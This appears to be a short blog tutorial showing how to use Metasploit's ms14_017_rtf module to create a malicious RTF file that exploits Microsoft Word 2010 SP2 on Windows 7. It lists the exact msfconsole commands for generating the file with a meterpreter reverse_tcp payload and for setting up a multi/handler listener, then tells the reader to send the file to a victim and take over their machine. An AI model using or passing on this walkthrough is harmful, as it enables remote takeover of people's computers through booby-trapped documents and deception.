This module creates a
malicious RTF file that when opened in vulnerable versions of Microsoft Word
will lead to code execution. The flaw exists in how a list override count field
can be modified to treat one structure as another. This bug was originally seen
being exploited in the wild starting in April 2014. This module was created by
reversing a public malware sample.
Exploit
Targets
Microsoft
Office 2010 SP2
Requirement
Attacker: kali Linux
Victim
PC: Windows 7
Now type use
exploit/windows/fileformat/ms14_017_rtf
msf exploit (ms14_017_rtf)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms14_017_rtf)>set lhost 192.168.1.7 (IP of Local
Host)
msf exploit (ms14_017_rtf)>exploit
After we successfully generate the malicious rtf File, it will stored on your local
computer
/root/.msf4/local/msf.rtf
Now
we need to set up a listener to handle reverse connection sent by victim when
the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.7
exploit
Now
send your msf.rtf files to
victim, as soon as they download and open it. Now you can access meterpreter
shell on victim computer
0 comments:
Post a Comment